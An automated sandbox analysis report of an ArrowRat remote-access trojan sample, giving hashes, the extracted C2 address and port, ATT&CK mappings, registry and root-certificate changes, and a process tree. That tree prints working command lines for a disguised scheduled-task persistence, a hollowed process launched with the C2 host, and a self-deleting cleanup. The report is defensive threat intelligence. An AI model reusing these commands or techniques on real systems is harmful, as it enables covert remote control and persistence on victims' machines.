arrowrat | e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

Resubmissions

11-11-2022 23:03

221111-216jyscc66 10

11-11-2022 22:52

221111-2ttltacc22 10

Analysis

max time kernel
300s
max time network
303s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
11-11-2022 22:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MRH.exe
Size

1.9MB
MD5

18585735c8866b21e2723a6f020bafd0
SHA1

afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256

e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA512

88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8
SSDEEP

49152:t82Cp8xP5AE/L4C0m9eKQr10XxpQQTf+4G7zsdtW:9E7eQqpIsG

Score

10^/10

arrowrat client persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

213.239.219.58:1337

Mutex

nPxRArUjc

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
960	Quoko tace wesa.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Deletes itself 1 IoCs

pid	Process
1716	cmd.exe

Loads dropped DLL 3 IoCs

pid	Process
1824	MRH.exe
1824	MRH.exe
960	Quoko tace wesa.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 960 set thread context of 1864	960	Quoko tace wesa.exe	37
PID 1864 set thread context of 1536	1864	InstallUtil.exe	39

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1640	schtasks.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	rundll32.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Quoko tace wesa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Quoko tace wesa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Quoko tace wesa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Quoko tace wesa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Quoko tace wesa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Quoko tace wesa.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
776	PING.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
1824	MRH.exe
1824	MRH.exe
1824	MRH.exe
1824	MRH.exe
1824	MRH.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
960	Quoko tace wesa.exe
1864	InstallUtil.exe
1864	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	1864	InstallUtil.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: SeShutdownPrivilege	1412	explorer.exe
Token: 33	1224	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1224	AUDIODG.EXE
Token: 33	1224	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1224	AUDIODG.EXE
Token: SeShutdownPrivilege	1412	explorer.exe

Suspicious use of FindShellTrayWindow 24 IoCs

pid	Process
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe
1412	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1864	InstallUtil.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1824 wrote to memory of 1640	1824	MRH.exe	27
PID 1824 wrote to memory of 1640	1824	MRH.exe	27
PID 1824 wrote to memory of 1640	1824	MRH.exe	27
PID 1824 wrote to memory of 1640	1824	MRH.exe	27
PID 1824 wrote to memory of 960	1824	MRH.exe	29
PID 1824 wrote to memory of 960	1824	MRH.exe	29
PID 1824 wrote to memory of 960	1824	MRH.exe	29
PID 1824 wrote to memory of 960	1824	MRH.exe	29
PID 1824 wrote to memory of 1716	1824	MRH.exe	30
PID 1824 wrote to memory of 1716	1824	MRH.exe	30
PID 1824 wrote to memory of 1716	1824	MRH.exe	30
PID 1824 wrote to memory of 1716	1824	MRH.exe	30
PID 1716 wrote to memory of 704	1716	cmd.exe	32
PID 1716 wrote to memory of 704	1716	cmd.exe	32
PID 1716 wrote to memory of 704	1716	cmd.exe	32
PID 1716 wrote to memory of 704	1716	cmd.exe	32
PID 1716 wrote to memory of 776	1716	cmd.exe	33
PID 1716 wrote to memory of 776	1716	cmd.exe	33
PID 1716 wrote to memory of 776	1716	cmd.exe	33
PID 1716 wrote to memory of 776	1716	cmd.exe	33
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1712	960	Quoko tace wesa.exe	36
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 960 wrote to memory of 1864	960	Quoko tace wesa.exe	37
PID 1864 wrote to memory of 1412	1864	InstallUtil.exe	38
PID 1864 wrote to memory of 1412	1864	InstallUtil.exe	38
PID 1864 wrote to memory of 1412	1864	InstallUtil.exe	38
PID 1864 wrote to memory of 1412	1864	InstallUtil.exe	38
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1864 wrote to memory of 1536	1864	InstallUtil.exe	39
PID 1412 wrote to memory of 916	1412	explorer.exe	41
PID 1412 wrote to memory of 916	1412	explorer.exe	41
PID 1412 wrote to memory of 916	1412	explorer.exe	41

C:\Users\Admin\AppData\Local\Temp\MRH.exe
"C:\Users\Admin\AppData\Local\Temp\MRH.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
  2⤵
  - Creates scheduled task(s)
  PID:1640
- C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
  "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:960
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\svchoste
    3⤵
    - Modifies registry class
    PID:1712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
      4⤵
      PID:1536
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:704
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:776

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x55c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
788.9MB

MD5
d85a1889dfc9c6c4d87953a0240a2ee4

SHA1
e68c00eb4a4b0c1e43892ebdb023dd72291b15e6

SHA256
763fc448252093bf8fd8c7d3743ec3233f434b14a2a84b16a9fe5f1a29b51317

SHA512
1823225bceea9b2349b502bd169eb4d2c2de660b26bbe32e351725d2d94aaa81a8a9c468148acfd30128ddb2f824ef22954c7adede80814bb27fba927cc22a38

Download Submit
\Users\Admin\AppData\Local\Temp\advapi32.exe

Filesize
316KB

MD5
f3842ab78d1121612935afb4425446b9

SHA1
9abd41807d106b82c1a2ee2558672b75bf2b9e13

SHA256
b907fbec5689961e11e5b56e33f6544abf57bbdc24af7f1e7b01e83c76992ba9

SHA512
254bc9a70fc65f71503b1ee1c307d4c11ccd39e4424c2827c1a1bf247a175e7248fdf4811f70c7e44f2ccda387e5752f69322d1aaf5a458f6dad26a18f579e51

Download Submit
\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
788.9MB

MD5
d85a1889dfc9c6c4d87953a0240a2ee4

SHA1
e68c00eb4a4b0c1e43892ebdb023dd72291b15e6

SHA256
763fc448252093bf8fd8c7d3743ec3233f434b14a2a84b16a9fe5f1a29b51317

SHA512
1823225bceea9b2349b502bd169eb4d2c2de660b26bbe32e351725d2d94aaa81a8a9c468148acfd30128ddb2f824ef22954c7adede80814bb27fba927cc22a38

Download Submit
\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
788.9MB

MD5
d85a1889dfc9c6c4d87953a0240a2ee4

SHA1
e68c00eb4a4b0c1e43892ebdb023dd72291b15e6

SHA256
763fc448252093bf8fd8c7d3743ec3233f434b14a2a84b16a9fe5f1a29b51317

SHA512
1823225bceea9b2349b502bd169eb4d2c2de660b26bbe32e351725d2d94aaa81a8a9c468148acfd30128ddb2f824ef22954c7adede80814bb27fba927cc22a38

Download Submit
memory/960-75-0x00000000021B0000-0x0000000002AA5000-memory.dmp

Filesize
9.0MB

Download
memory/960-73-0x0000000002AB0000-0x0000000002C77000-memory.dmp

Filesize
1.8MB

Download
memory/960-66-0x00000000021B0000-0x0000000002AA5000-memory.dmp

Filesize
9.0MB

Download
memory/960-67-0x00000000021B0000-0x0000000002AA5000-memory.dmp

Filesize
9.0MB

Download
memory/960-86-0x0000000002AB0000-0x0000000002C77000-memory.dmp

Filesize
1.8MB

Download
memory/960-81-0x000000000EDF0000-0x000000000FA3A000-memory.dmp

Filesize
12.3MB

Download
memory/960-77-0x0000000002AB0000-0x0000000002C77000-memory.dmp

Filesize
1.8MB

Download
memory/960-72-0x0000000002AB0000-0x0000000002C77000-memory.dmp

Filesize
1.8MB

Download
memory/1412-106-0x0000000002610000-0x0000000002620000-memory.dmp

Filesize
64KB

Download
memory/1412-96-0x000007FEFB5C1000-0x000007FEFB5C3000-memory.dmp

Filesize
8KB

Download
memory/1536-92-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1536-93-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1536-101-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1536-103-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1536-98-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1536-95-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1536-97-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1824-54-0x0000000002670000-0x0000000002F65000-memory.dmp

Filesize
9.0MB

Download
memory/1824-59-0x0000000002670000-0x0000000002F65000-memory.dmp

Filesize
9.0MB

Download
memory/1824-58-0x0000000075571000-0x0000000075573000-memory.dmp

Filesize
8KB

Download
memory/1824-70-0x0000000000A00000-0x0000000000BC7000-memory.dmp

Filesize
1.8MB

Download
memory/1824-57-0x0000000000A00000-0x0000000000BC7000-memory.dmp

Filesize
1.8MB

Download
memory/1824-56-0x0000000000A00000-0x0000000000BC7000-memory.dmp

Filesize
1.8MB

Download
memory/1824-55-0x0000000002670000-0x0000000002F65000-memory.dmp

Filesize
9.0MB

Download
memory/1824-60-0x0000000000A00000-0x0000000000BC7000-memory.dmp

Filesize
1.8MB

Download
memory/1864-89-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1864-87-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1864-84-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1864-82-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download